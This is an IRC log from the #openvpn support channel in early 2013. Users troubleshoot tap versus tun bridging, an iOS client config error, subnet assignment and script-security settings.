21:35 <@krzee> im sure thats a surprise, but its true lol
21:35 <@krzee> that sort of setup will FORCE you to understand iroute
21:36 <@krzee> hell, i had to dig into the code to understand it (so glad they do good commenting in the code!)
21:36 <+pekster> Real-world networking has enough complexities I don't care to create them needlessly when I'm at home
21:36 <@krzee> im into darknet building, it has real-world uses ;]
21:37 <@krzee> in the case of that test, one need not fully trust a few of the machines in the middle to use them in the darknet
21:38 <+pekster> Yea, darknet is just a shorthand way to explain Internet recursion
21:38 <@krzee> i dont help people directly with vpnchains too often tho, i simply tell them to understand !route good enough and the rest figures itself out ;]
21:38 <+pekster> tor is kind of a darknet in that sense, although they have gateways connecting both sides to eachother breaking the disjoined aspect
21:39 <@krzee> .onion is more darknet than tor itself, but i see what you mean and agree
21:40 <+pekster> Yea, I meant their tld
21:40 <+pekster> Otherwise it's a glorified cryptographically secure anonymous proxy
21:42 <@krzee> in that case i slightly misunderstood and now fully agree without needing to liberally read into it ;]
21:42 <@krzee> i love watching my apps tell me what people in the office are doing
21:44 <@krzee> they watch the db for certain types of changes and message me about who does what, without anyone except me, the owner, and now the other 169 people in here knowing
21:45 <@krzee> one of the things that makes my $job so much cooler than Maverick0984's $job, i get to come up with cool ideas like that, and implement them
21:46 <@krzee> nobody ever says "no, do it like this" they just say a variation of "cool, thanks for implementing your ideas"
22:11 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer]
22:12 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
22:20 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
22:26 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
22:47 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving]
--- Day changed Sun Feb 03 2013
00:49 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out]
00:53 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
01:05 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
01:06 -!- bjh4 [~bjh4@67.87.105.111] has quit [Ping timeout: 245 seconds]
01:25 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn
02:11 -!- Sickness\ is now known as sickness\
02:11 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
02:16 -!- sickness\ is now known as Sickness\
02:16 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host]
02:16 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn
02:44 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has joined #openvpn
02:45 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
03:26 -!- Sickness\ is now known as sickness\
03:31 -!- sickness\ is now known as Sickness\
03:34 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
03:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds]
03:46 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
03:47 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
03:52 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.]
04:01 < eugenmayer> iam sorry, but iam here again :)
04:02 < eugenmayer> After being able to setup the routed approach to merge two different (VPN) networks, in my case the TCP and UDP one, i would like to do the same with the bridged network, but with a slightly different approach. It makes a lot of effort in this specific network to deal with the new ip range, lets say 10.66.0.0 and 10.66.1.0 .. so i want to avoid this and go the "bridge approach"
04:03 < eugenmayer> i have found something here http://serverfault.com/questions/173307/sharing-an-ip-pool-for-two-openvpn-instances-one-tcp-and-one-udp .. but basically its just creating two tap devices with the same IP range, then bridging them to a new device, right?
04:03 <@vpnHelper> Title: dhcp - Sharing an IP pool for two openvpn instances (one TCP and one UDP) - Server Fault (at serverfault.com)
04:05 <+pekster> Do you really need Layer 2 (Ethernet) connections between the 2 instances?
04:05 <+pekster> If you're using IP (ie: IP addresses) to communicate, you don't need bridging at all
04:06 <+pekster> !tunortap
04:06 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
04:06 <@vpnHelper> over the vpn or (#4) lan gaming? use tap!
04:08 < eugenmayer> pekster: for that specific network yes. I have 6 routed, 1 bridged
04:09 < eugenmayer> i switched all networks from tap to tun a while ago, since EugeneKay advised it. But with this one, i have to keep bridged and thats just fine
04:09 <+pekster> What protocol requires L2?
04:10 <+pekster> Outside of exotic use-cases like BGP, game broadcast advertisements, or multicast, you generally don't really need a bridged setup
04:11 < eugenmayer> pekster: one reason is multicast, the other is an application / maintenance reason
04:12 <+pekster> That said, sure, you can create a bridge and include tap0, tap1, and some physical device, and given the right firewall rules they'll all be on the same L2 link
04:12 <+pekster> tap0/tap1 binds to your two TCP/UDP instances, and eth0 to whatever the physical link is. Figure out some way to unify the addressing between them and it all works
04:13 < eugenmayer> pekster: unifying is ensured due to ccd
04:15 < eugenmayer> nice, it just worked
04:15 < eugenmayer> pekster: to be honest, looking at how comfortable this was with the bridged setup, its really a big plus for TCP/UDP merged networks
04:15 <+pekster> Only if you really need L2 visibility. Otherwise it's really inefficient with broadcasts, ARPs, and the overhead
04:16 < eugenmayer> because of CCD, i have now to do a lot more firewall-exceptions in those routed UDP/TCP networks, since the UDP guys have not their "original" ip
04:16 <+pekster> Just stick all the VPN networks in a supernet and be done with it
04:16 < eugenmayer> its just in our case, a lot of ports are client-specific firewalled .. and if you have a client with 10.77.0.12 .. and he connects with TCP having 10.77.1.12 ..even if the networks are routed..you have to adjust every single FW rule
04:16 <+pekster> If you declare 10.20.0.0/16 as your VPN range, that gives you up to 256 /24's to allocate to VPN networks
04:17 <+pekster> The right high-level choices when laying out a network make life easier down the road
04:17 < eugenmayer> hmm, but that still wont help me in this case, or?
04:17 < eugenmayer> i mean, the TCP client MUST have a different IP than the UDP client ( same client ) in routed setups, right?
04:18 < eugenmayer> (dont get me wrong, i absolutely get your idea, but for that firewall exceptions, it will not really help, as long a client can connect using TCP or UDP)
04:18 <+pekster> Sure. Use a --client-connect script to firewall them if that's what you want. I did this easily for "contract" accounts that connected to my former employer's network. They were only allowed to go to specific hosts/ports due to security concerns
04:18 <+pekster> Right. Set up your stuff properly and it won't matter where they connect or what IP they have
04:19 < eugenmayer> Wait, just stick to that
04:19 <+pekster> Your setup is really insecure if you trust the IP, because you do realize a client can set their own IP on the tap network, right?
04:19 < eugenmayer> pekster: hm, i thought he will not be able to communicate through the tunnel anymore, since openVPN secures that?
04:19 < eugenmayer> (call me stupid, i might be wrong on this)
04:19 <+pekster> In tap you've just given the client direct Ethernet access to anything on the bridge
04:20 < eugenmayer> so thats only valid for tun?
04:20 <+pekster> Right, in tun an openvpn server drops traffic that is sourced from an invalid address
04:21 <+pekster> In tap it only cares about the MAC since it's a Layer 2 connection
04:21 <+pekster> tap = OSI Layer 2
04:21 <+pekster> tun = OSI Layer 3
04:21 <+pekster> In other words, you're doing your security completely wrong
04:22 < eugenmayer> well no and yes
04:22 <+pekster> It's like a MAC filter on some home firewall. Sure, it might keep the random stranger from connecting to you, but it's not "secure"
04:22 < eugenmayer> lets say for the tap devices iam doing basically bad..but its not that IP based FW is the only secure-protocol. Its still keys and so forth..its just a generic approach
04:22 <+pekster> Yes, the data is protected. But "any" client can use "any" IP on a tap-based VPN
04:22 < eugenmayer> for the tun networks it seems to be better. But yeah, thanks for opening my eyes here
04:23 <+pekster> You can even perform attacks like ARP-spoofing
04:23 < eugenmayer> if i have IP based fw rules and i would switch to bridged for easier TCP/UDP network rules, i just fk it up
04:23 < eugenmayer> pekster++
04:23 <+pekster> A VPN client on your tap VPN can ARP-poison any client on either VPN or the physical network you've bridged. This includes your default gateway
04:24 < eugenmayer> Is that one of the reasons you dont advise tap ?
04:24 <+pekster> Indeed.
04:24 <+pekster> If your reason is "it's easier to firewall" you're doing it wrong to begin with
04:24 <+EugeneKay> Plus it eats kittens.
04:24 <+EugeneKay> Please, think of the kittens.
04:24 <+pekster> Yes. That too :P
04:26 < eugenmayer> EugeneKay: well in my software-developer job i kill kittens all day
04:26 <+pekster> /usr/local/sbin/openvpn --sacrifice-kitten --dev tap0 ...
04:26 < eugenmayer> as 30% of my time i do PHP, and that kills em all
04:26 < eugenmayer> so it does not really matter for me, iam sorry. Kittens are all dead by now
04:27 < eugenmayer> Iam a bad person, i know
04:27 < eugenmayer> eugenmayer--
04:27 <+pekster> L2 isn't bad if you're using it for the right reasons. As seen in the bot's comment above, most people don't
04:27 <+pekster> Usually folks use it as a crutch for something better handled through correct network layout
04:28 <+pekster> Very few things on the modern Internet/WAN actually need L2
04:29 < eugenmayer> EugeneKay: explained me, how i potentially could switch to tun with my specific need pekster, but as usual, i did not understand a single word of what he said
04:29 -!- catsup [d@64.111.123.163] has quit [Read error: Connection reset by peer]
04:29 < eugenmayer> (me being the reason)
04:30 <+pekster> The only valid reason you listed is multicast. Do you really need multicast over the VPN? What's the use-case there?
04:31 < eugenmayer> One reason for me is, that my automated application deployment does ip-based vhosts setups for the maintenance network, means: The client has his own interface, lets say eth0, could be anything. The application is deployed for his network on a specific ip (auto setup) …. now for the maintenance vhost we use the VPN, where the server of the customer is a client, lets say one ip of 10.66.0.0 ...
04:32 < eugenmayer> One issue is, if the tun interface goes down, e.g. the customers network-connection drops, firewall tests or our VPN server detonates, all services bound to that IP do crash
04:32 < eugenmayer> since there is no interface with network left
04:32 <+pekster> If your application crashes because it can't reach an internal VPN-assigned IP, you've screwed up way before OpenVPN
04:33 <+pekster> OpenVPN can't fix stupid programming practices
04:33 < eugenmayer> pekster: no, its not reaching..its rather daemons
04:33 < eugenmayer> like mysql but also vhost configurations
04:34 <+pekster> Oh, so you're binding to the IP on the tun interface?
04:34 < eugenmayer> yes, thats the issue
04:34 <+pekster> Solve that by binding to *:port and firewall it
04:34 <+pekster> Use the wildcard address to bind
04:34 <+pekster> Or bounce services bound to a VPN IP when the VPN goes down. --up and --down scripts can hook into this for you if you want
04:35 < eugenmayer> yeah, it sounds that simple, but since this is all automated, of course that is a huge amount of work .. firewalling is easy..i do the firewalling anyway, no matter what i bound to
04:35 < eugenmayer> ( i do not need to add anything new to the firewall, thats what i meant, its up there to cut anything else off anyway…its deny all with only a few exceptions.no matter what the services bound to)
04:36 < eugenmayer> pekster: well i have to think about that and test it. Thanks for clarifying even more what downsides bridged networks have
04:37 <+pekster> You really don't need Ethernet at all. Last big company I had a regular gig at, they had thousands of remote servers (some physical, many virtual) with a VPN IP running all sorts of stuff: ssh, java apps, and some other stuff. It all worked fine over a tun setup. If your apps don't, you've designed them poorly
04:37 <+pekster> (openvpn, btw)
04:37 < eugenmayer> well its not an application issue, its a deployment/infra issue
04:38 <+pekster> "Deployment" = "some application that does stuff" at a high level
04:38 < eugenmayer> the applications does not care of all (of course), its rather daemons going down
04:38 <+pekster> "daemons" "deployment" ... you're doing a great job of failing to explain what *network* protocols you *need* ethernet-level connectivity for
04:38 < eugenmayer> yeah, i might separate them differently. Application (the one we sell) .. anything else "infrastructure" but i get your point, it does not matter for you
04:39 < eugenmayer> i dont need OSI level 2 at all, thats for sure. We dont need multicast "really" here
04:39 < eugenmayer> there is one network we need that, thats our proxmox network, since the cluster-setup uses multicast to find its nodes
04:40 -!- julius [~julius@141.41.92.122] has joined #openvpn
04:40 < eugenmayer> (the network all proxmox nodes are connected) but in the end, i dont have any other network relying on multicast
04:40 -!- julius is now known as Guest32238
04:41 < eugenmayer> I dont want to waste your time even more. You have been a really great help to me. I will initiate a sprint to see how we can change that network to a routed one
05:05 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has quit [Ping timeout: 252 seconds]
05:18 -!- dazo_afk is now known as dazo
05:35 -!- mode/#openvpn [-v pekster] by ChanServ
05:58 < spitf1r3> Hi. Does anybody here use OpenVPN Connect for iOS?
06:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
06:15 < kisom> spitf1r3: I do
06:16 < kisom> Spent yesterday and the day before that on getting everything to work, doing trial rollouts atm :)
06:16 < spitf1r3> I got a strange problem:
06:16 < spitf1r3> 2013-01-31 14:30:01 EVENT: CONFIG_FILE_PARSE_ERROR option_error: remote option not specified [ERR]
06:16 < spitf1r3> 2013-01-31 14:30:01 EVENT: DISCONNECT_PENDING
06:16 < spitf1r3> And I DO have remote in my config file
06:17 < kisom> Paste your client config somewhere.
06:17 < spitf1r3> and it's resolvable
06:17 < spitf1r3> ok
06:18 < spitf1r3> can I msg you?
06:19 < kisom> Just paste it on www.pastebin.ca
06:19 < spitf1r3> http://pastie.org/6033049
06:19 -!- mattock_afk is now known as mattock
06:19 < spitf1r3> oh
06:20 < spitf1r3> that's an old one..
06:20 < spitf1r3> hold on
06:21 < spitf1r3> http://pastie.org/6033062
06:22 < spitf1r3> Short message says VPN-On-Demand configuration error: CertificateRef undefined
06:23 < kisom> Seems legit. Try adding verb 7 and check the logs on your ipad
06:23 < spitf1r3> And it does that no matter if I have a certificate uploaded to my iPod as ca/crt/key
06:23 < spitf1r3> or unified
06:23 < spitf1r3> or installed in iOS from p12
06:24 < kisom> spitf1r3: Can you try with my unified config file? I know it works
06:24 < kisom> http://www.pastebin.ca/2310334
06:24 < spitf1r3> I did try that
06:24 < spitf1r3> with the same result
06:25 < spitf1r3> but I need to make sure what do I need to put there
06:25 < spitf1r3> :)
06:25 < kisom> Just paste your ca, certificate and key in their respective "xml" tag
06:26 < spitf1r3> this is what I used: http://pastie.org/6033073
06:27 < kisom> spitf1r3: Set verb 7 in whatever configuration you're using and upload the iOS client log somewhere
06:27 < spitf1r3> ca.crt as mieszko-ipodtouch4.key as and mieszko-ipodtouch4.crt as
06:27 < spitf1r3> of course the contents of these
06:28 < spitf1r3> parts from -----BEGIN CERTIFICATE----- to -----END CERTIFICATE-----
06:28 < spitf1r3> kisom: I just need to know if I pasted right stuff to right fields. These certs have been generated by openvpn-easy-rsa
06:28 < spitf1r3> so should be fairly standard by naming
06:29 < kisom> spitf1r3: Yes, that's correct. But according to what you said before the certificates are not the problem here
06:29 < spitf1r3> okay
06:30 < spitf1r3> but short message in ovpnconnect says: "VPN-On-Demand configuration error: CertificateRef undefined"
06:30 < spitf1r3> that's why I want to make sure
06:31 < kisom> OK
06:31 < kisom> I'll continue helping you when you've sent me the verb 7 log files.
06:33 < spitf1r3> ok
06:33 < spitf1r3> and the log is EXACTLY the same (ok, the hour is different)
06:34 < spitf1r3> and that's the WHOLE log. Only 2 lines
06:34 < kisom> OK
06:35 < kisom> So I assume OpenVPN fails to parse your config and then complains that the remote directive is missing.
06:35 < spitf1r3> and a very similar config (but with p12) works on my android phone
06:36 < spitf1r3> (same server)
06:36 < kisom> Try with the config file I posted.
06:36 < kisom> I also had issues with some other config files
06:37 < kisom> Just change the cipher and your remote server
06:37 < spitf1r3> auth-user-pass is for authenticating with user/password?
06:37 < spitf1r3> I'm authenticating with a crt ONLY
06:37 < kisom> Same
06:37 < kisom> I just leave it blank
06:37 < kisom> At least on my testing setup
06:39 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn
06:39 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
06:40 < spitf1r3> I don't know the cipher, I didn't specify it in server config
06:40 < spitf1r3> what is the default?
06:40 < kisom> Comment it out then
06:40 < kisom> The default one is blowfish-128 if i remember correctly
06:43 < spitf1r3> it's the same..
06:43 < spitf1r3> I've tried to ping the host, and it resolves correctly
06:46 < spitf1r3> kisom: any ideas?
06:46 < kisom> spitf1r3: Working on it, sec
06:47 < spitf1r3> Just to make sure: you are using Official OpenVPN Connect from AppStore, not GuizmoVPN from cydia?
06:47 < kisom> Yes
06:47 < spitf1r3> because GuizmoVPN used to work for me
06:53 < spitf1r3> I need to go, and will be away for next 30 minutes. But I do have an always-on IRC client, so you can write me, and I won't miss it.
06:53 < kisom> OK, great.
06:53 < spitf1r3> When I'm back, I'll ping you
06:53 < spitf1r3> same nick, same all
06:54 < spitf1r3> and I'll be able to test it from another network then, too.
06:54 < kisom> spitf1r3: Try this profile when you're back: https://stormhub.org/dump/iOS-Test-Profile.ovpn
06:58 < kisom> Tell me when you're back and I'll enable that certificate so you can connect
06:58 -!- mattock is now known as mattock_afk
07:02 -!- master_of_master [~master_of@p57B5233B.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
07:02 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Read error: Connection reset by peer]
07:03 -!- master_of_master [~master_of@p57B554B3.dip.t-dialin.net] has joined #openvpn
07:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
07:25 <+EugeneKay> I think it goes without saying that posting private keys in a public IRC channel is a very, very bad idea.
07:26 < spitf1r3> I'm still on the move, but I can tell that my android phone fails to connect with this profile
07:27 < kisom> EugeneKay: Why is that? That specific certificate doesn't have permission to do anything.
07:27 <+EugeneKay> ......It's just a general principle of sanity.
07:27 <+EugeneKay> Private keys. It's in the name.
07:27 < spitf1r3> kisom: so I guess it won't work on ios as well
07:27 < kisom> spitf1r3: I'm logged on to that specific profile as we speak, on iOS
07:28 < spitf1r3> okay
07:28 < spitf1r3> well try it in a few minutes when I'm back
07:29 < kisom> spitf1r3: Try it again now
07:29 < kisom> On android, that is
07:31 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
07:32 < kisom> spitf1r3: I see you on the server
07:32 < spitf1r3> worked on android
07:32 < kisom> Yeah I was denying that certificate before, that's why you got an error
07:34 -!- Eagleman [~Eagleman@vpn.eagleman.net] has left #openvpn []
07:55 < spitf1r3> I'm back
07:55 < spitf1r3> hold on, I'll try it on iOS
08:05 -!- b1rkh0ff [~b1rkh0ff@178.77.15.65] has quit [Ping timeout: 255 seconds]
08:08 <@plaisthos> yeah: Author: Samuli Seppänen
08:08 <@plaisthos> :D
08:09 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
08:13 -!- mattock_afk is now known as mattock
08:18 -!- b1rkh0ff [~b1rkh0ff@178.77.21.150] has joined #openvpn
08:20 < kisom> spitf1r3: Did it work?
08:20 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
08:25 < spitf1r3> kisom: I get the same error...
08:25 < spitf1r3> I'll remove this app
08:25 < spitf1r3> and try again..
08:26 -!- Eagleman [~Eagleman@84.107.205.159] has joined #openvpn
08:26 < kisom> spitf1r3: What iOS version are you on?
08:27 < spitf1r3> 6.0.1
08:27 < spitf1r3> Jailbroken
08:27 < spitf1r3> And I think I just found a reason why it didn't work
08:27 < kisom> OK, I'm on 6.1, non-JB
08:27 < spitf1r3> /etc/hosts was messed up
08:27 < spitf1r3> just copied from another device, will test now
08:28 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 264 seconds]
08:32 -!- Eagleman [~Eagleman@84.107.205.159] has quit [Ping timeout: 245 seconds]
08:38 < spitf1r3> Hmm, still the same
08:38 < spitf1r3> will try another device
08:38 < kisom> OK, I've tried that specific profile on both my iPhone and my iPad, and it works on both
08:39 < kisom> Guess you're out of luck. Reinstall the iPod and I'm sure it'll work great.
08:40 < kisom> I'm gonna disable that profile now btw, I see 5 people connected from that certificate I posted :)
08:40 < spitf1r3> can you hold that profile for a few moments?
08:40 < spitf1r3> oh
08:40 < kisom> Sure
08:40 < kisom> I'll wait.
08:41 < spitf1r3> hmmm
08:41 < spitf1r3> it works
08:41 < spitf1r3> when I've restarted in 'safe mode' (without any tweaks)
08:42 < spitf1r3> wonder what causes that
08:42 < spitf1r3> okay, go on and disable that:)
08:42 < spitf1r3> Thanks for help
08:42 < kisom> np
08:43 < spitf1r3> Now if you see such problem ask (jailbroken) people to restart in (mobilesubstrate) safe mode;)
08:47 -!- mattock is now known as mattock_afk
09:05 -!- mattock_afk is now known as mattock
09:13 -!- bjh4 [~bjh4@67.87.105.111] has joined #openvpn
09:14 -!- mattock is now known as mattock_afk
09:36 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 264 seconds]
09:38 -!- BtbN [~btbn@btbn.de] has joined #openvpn
09:52 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 264 seconds]
09:55 -!- bjh4 [~bjh4@67.87.105.111] has quit [Ping timeout: 245 seconds]
09:55 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has joined #openvpn
10:06 -!- Guest32238 [~julius@141.41.92.122] has left #openvpn []
10:07 -!- julius_ [~julius@141.41.92.122] has joined #openvpn
10:07 < julius_> hi
10:07 < julius_> any hints for optimizing openvpn over tor?
10:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
10:08 -!- dazo is now known as dazo_afk
10:12 -!- blackmagic [~black@got.laid.using.blackmajic.org] has quit [Ping timeout: 276 seconds]
10:14 -!- blackmagic [~black@got.laid.using.blackmajic.org] has joined #openvpn
10:25 -!- julius__ [~julius@141.41.92.122] has joined #openvpn
10:25 -!- julius_ [~julius@141.41.92.122] has quit [Ping timeout: 245 seconds]
10:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
11:00 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
11:25 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 255 seconds]
11:28 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds]
11:29 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has joined #openvpn
11:50 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
11:51 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Read error: Connection reset by peer]
11:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
11:55 -!- Valcorb [~Valcorb@84.198.139.192] has joined #openvpn
11:57 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 245 seconds]
11:59 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds]
12:00 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
12:01 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn
12:05 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
12:05 -!- Valcorb [~Valcorb@84.198.139.192] has quit [Ping timeout: 245 seconds]
12:13 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
12:16 -!- Valcorb|| is now known as Valcorb
12:31 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
12:32 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
12:38 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has quit [Ping timeout: 248 seconds]
12:39 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has joined #openvpn
12:39 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has quit [Remote host closed the connection]
12:41 < bandroidx> is there a way to suppress the Openvpn Requires script-security 2 line on client connect?
12:41 < bandroidx> i tried verb 0 but its still showing
12:45 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has joined #openvpn
13:11 -!- madsage [sage@2001:470:c:1292::2] has joined #openvpn
13:11 < madsage> word
13:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
13:17 -!- frsk [fredrik@joy.frsk.net] has quit [Quit: Reconnecting]
13:17 -!- frsk [fredrik@frsk.net] has joined #openvpn
13:18 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds]
13:19 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: leaving]
13:22 < madsage> http://pastebin.com/FLKHTm17
13:22 < madsage> anybody see anything wrong with that?
13:23 < madsage> its not routing right. keeps handing me an ip of 10.10.253.6 and a gw of .5
13:23 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:23 < madsage> server uses 10.10.253.1 on tun1
13:24 < madsage> should i use ifconfig with 255.255.255.252? i'm the only connection
13:25 < madsage> any feedback would be highly appreciated. tia
13:29 < madsage> will redirect-gateway woth with ifconfig statements? i can just staticly assign if it plays together
13:29 < madsage> woth/work
13:40 < madsage> ok. .5 is only a virtual IP address inside the OpenVPN server, used as an endpoint for routes
13:41 < madsage> so my issue is not with the assignment address. i assume its bridged with .1 on the tun device internally
13:42 < madsage> If you know that only non-Windows clients will be connecting to your OpenVPN server, you can avoid this behavior by using the ifconfig-pool-linear directive.
13:42 < madsage> cool
13:43 < madsage> lets try that
13:54 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
14:10 < rob0> !/30
14:10 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf
14:12 < rob0> madsage, ^^
14:15 < rob0> bandroidx, did you try specifying a script-security setting in your config? If 'verb 0' didn't work, and that doesn't work either, your choices are to grep -v your logs such as not to see it, or to close your eyes and ignore it. :)
14:16 -!- novaflash is now known as novaflash_away
14:16 < bandroidx> LOL if it was me I wouldnt care, but i have ppl who use the server who keep telling me "it gives me an error!"
14:16 < bandroidx> lol
14:16 < bandroidx> speaking of script security that reminds me, i have a clientconnect.sh script that it runs and it wont work unless i set script-security 2 system
14:16 < bandroidx> it requires the system
14:16 < bandroidx> my guess is because it runs sqlite3 from the script
14:17 < bandroidx> i am just concerned because they say system call is deprecated
14:18 < rob0> iirc the warning about script-security is for backward compatibility with the changed setting. Older openvpn did not have that.
14:18 < bandroidx> so its safe to leave "system" ?
14:18 < rob0> "safe" is subjective, I cannot possibly guess. 14:19 < bandroidx> well i guess i dont have a choice 14:19 < rob0> See --script-security in the man page and decide what you want. 14:19 < bandroidx> i did 14:19 < bandroidx> thats where i read about it being deprecated 14:19 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has quit [Remote host closed the connection] 14:19 -!- novaflash_away is now known as novaflash 14:19 < bandroidx> based on what i read i prefer to NOT use it, but it seems I don't have a choice 14:20 < bandroidx> its no biggie the server is locked down 14:21 < bandroidx> i dont see a way anyone could inject into that script 14:21 < bandroidx> so i think system is safe to use 14:21 < madsage> rob0, thanks yeah i figured that out. was even trying to make my own /30 it didnt like it in server mode 14:21 < rob0> right, it seems unlikely to me also 14:21 < bandroidx> any idea if there is a way to tell openvpn to use multiple tunnels for a connection? 14:22 < bandroidx> i am connecting to a server overseas with bad peering and the only way to max out the connection is to use multiple connections 14:22 < bandroidx> like if I ftp file normally I get 1MB/s with a single transfer but if i set the client to download 6 files at once I get 6MB/s 14:22 < madsage> but, yeah i also enabled ifconfig-pool-linear helped some of my other routing i was trying to do 14:22 < bandroidx> i thought perhaps using multiple tunnels would simulate the same effect 14:23 < rob0> You can run as many instances as you want, I guess. The trick (and this is a question for your OS) is to load balance the traffic among the different tunnel IP addresses. 14:23 < bandroidx> i was hoping there was a way to do it with a single connection 14:23 < bandroidx> i didnt think so though 14:24 < bandroidx> like a magical --tunnelsperconnection argument :) 14:24 < madsage> rob0, is there a limit or ceiling per connection? 
14:25 < madsage> or it varried per hardware and network variables
14:25 < madsage> varries
14:25 < rob0> right, varies
14:26 < rob0> Sometimes the lack of multi-threading can be an issue. Your openvpn process is stuck on one core/CPU, can't distribute the load via SMP threading.
14:26 < madsage> speaking of that. do you know of any linux kernel tuning that may help? like for buffers rcv/tx etc?
14:27 < madsage> or maybe kernel tick timing could help?
14:27 < rob0> (Multi-threading is something the developer folk have been planning to work on in the next version.)
14:27 < rob0> dunno
14:27 < madsage> rob0, yeah heard that. would be awesome
14:28 < madsage> especially with all the new arm processors with multicores but not much power on single thread
14:34 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 240 seconds]
14:34 -!- Devastator [~devas@177.99.152.211] has joined #openvpn
14:34 -!- Devastator [~devas@177.99.152.211] has quit [Read error: Connection reset by peer]
14:36 -!- Devastator [~devas@177.99.152.211] has joined #openvpn
14:39 -!- mode/#openvpn [+v pekster] by ChanServ
15:03 < madsage> sweet everything is working now. updated both sides with 2.3.0 as well
